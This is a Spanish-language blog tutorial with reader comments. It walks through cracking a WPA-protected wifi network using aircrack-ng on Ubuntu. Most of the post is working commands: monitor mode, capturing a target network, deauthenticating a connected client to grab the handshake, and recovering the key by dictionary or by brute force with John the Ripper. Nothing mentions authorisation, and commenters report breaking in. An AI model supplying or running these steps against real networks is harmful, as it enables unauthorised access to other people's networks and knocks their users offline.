Creo que la posibilidad que Internet da a las personas de publicar sus palabras, su trabajo, sin necesitar un modelo de negocio es algo realmente glorioso.

Hackear y crackear red wifi WPA

Hackear y crackear red wifi WPA

Escrito por AAR

Categoría: Hacks

Nota: Si buscas diccionarios para WPA entra aquí.

¿Qué es WPA?

WPA es la abreviatura de Wifi Protect Access, y consiste en un mecanismo de control de acceso a una red inalámbrica, pensado con la idea de eliminar las debilidades de WEP. También se le conoce con el nombre de TSN (Transition Security Network).

¿Para quien está dirigido este tutorial?

Únicamente para gente con experiencia en el crackeo de redes wifi de tipo WEP, ya que es lo más básico. Si no sabes hacerlo (ya que se utilizarán programas y términos que vimos en el tutorial pasado) te recomiendo que leas un poco sobre redes.

¿Qué haremos

Hackearemos y crackearemos una red inalambrica con seguridad WPA activada. El tutorial abarca dos opciones: Con diccionarios y con bruteforce. Igualmente está escrito para ejecutarlo en el sistema operativo Ubuntu 10.04 de Linux.

¿Cómo lo haremos?

Para realizar el crackeo de una red inalambrica con seguridad WPA habilitada tendremos que capturar una clave llamada Handshake, a través de ella nos será posible realizar el crackeo tanto con diccionarios o con bruteforce. Para esto, es necesario que un cliente esté conectado a la red.
Utilizaremos la suite aircrack-ng. El crackeo funciona en PSK, TKIP y AES/CCMP.

Comenzamos

Abrimos la terminal, especificaré cuando es necesario abrir otra terminal o una nueva pestaña. Necesitarás ser siempre super usuario:

sudo su

Activamos modo monitor:

airmon-ng start wlan0

Monitoremos:

airodump-ng mon0

De preferencia abrimos un editor de texto y llenamos los siguientes campos:

  • ESSID: Nombre de la red
  • BSSID: Clave de este estilo: 00:11:22:33:44:55
  • Channel: Canal donde se encuentra
  • Station: Está en la segunda linea, hay una columna llamada Station (00:11:22:33:44:55) debe de indicar el mismo BSSID de la red que queremos atacar.

Tecleamos la combinación Control + C para detener el proceso.

Nos conectamos:

airodump-ng -c [# canal] -w [ESSID] --bssid [BSSID] mon0

Abrimos nueva terminal.

Des-autenticamos para obtener el famoso Handshake

aireplay-ng --deauth 1 -a [BSSID] -c [Station] mon0

Regresamos a la primera terminal y veremos en la esquina superior derecha algo así:

WPA handshake: [00:11:22:33:44:55]

Aquí van las dos opciones de crackeo:

Diccionario

Buscamos por la red, descargamos un buen diccionario y corremos:

aircrack-ng [ESSID]*.cap -w [Ruta diccionario]

Y obtendremos la clave, dependiendo que tan larga y complicada esté o que tan bueno esté el diccionario. Si necesitas diccionarios entra aquí.

Fuerza Bruta

Utilizaremos John The Ripper. Para instalarlo escribimos:

sudo apt-get install john

Para crackear la red lo utilizamos de esta manera:

john -incremental=all --stdout | aircrack-ng -w - -e [ESSID] -a 2 [ESSID]*.cap

Personalmente recomiendo el método de diccionarios, la fuerza bruta puede tardar desde unos minutos, hasta días, semanas y meses.

Desgraciadamente, van pasando los años y la tecnología avanza, todo es crackeable, por lo menos de alguna manera.

9 Comentarios para esta entrada

  1. poseidon Says:

    chuta lo mejor q han hecho en el mundo y los felicito por todo y sigan adelante………..

  2. AAR Says:

    Gracias, sigue visitándonos.

    Recuerda que puedes ponerte en contacto con nosotros para cualquier duda, sugerencia o comentario.

  3. Fuetgo Says:

    muy bueno ya hice todo y efectivamente funciona muchas de tus entradas me han sido muy útiles gracias !! y felicidades haces un muy buen trabajo

  4. andres Says:

    que onda oye muy buen aporte, pero ya lo intente con diccionario y nada despues intente el modo fuerza bruta y se tardo mucho, asi que le di enter y puse el codigo como si lo fuera a sacar con diccionario y “”"si me dio 4 keys pero todas muy largas de 16 caracteres y ademas no funcionaron.
    que podra ser? o estoy haciendolo mal? porfa agradeseria mucho su ayuda.
    “a pense que tal vez estaban en modo hexadecimal y que habia que convertirlas” te paso mi correo y si puedes ayudame si porfa–

  5. Daniel Says:

    En verdad muchas gracias una manera muy practica, he buscado esta informacion por muchos lados pero todos se hacian lios, por fin pude lograr lo mensionado en el articulo, muchisimas gracias

    Me funciono todo a la Primera ¥(=^_^=)¥

  6. AAR Says:

    El método de fuerza bruta y por diccionario al querer atacar una red con encriptación WPA llega a ser difícil, en algunos casos, como en el de Daniel le fue fácil pero este método por lo mismo, por los métodos usados se llega a complicar.

  7. alejandro Says:

    Gracias Amigo por toda la ayuda hace mucho tiempo que no veia un tutorial asi cualquier cosa lo publico thank you !!

  8. ubuntufan Says:

    WOow!!!
    Debo decir que hacear una red con encriptacion wep, cualquiera lo hace y en 30 seg, pero para una con encripatacion wpa, es una verdadera odisea!!!

    saludos y suerte con las desdichadas wpa!!!

  9. nico 774you Says:

    Buenas un videotutorial WPAcon el beini 122 o 121 por fa… gracias

Deja un comentario ¿Qué opinas sobre este artículo?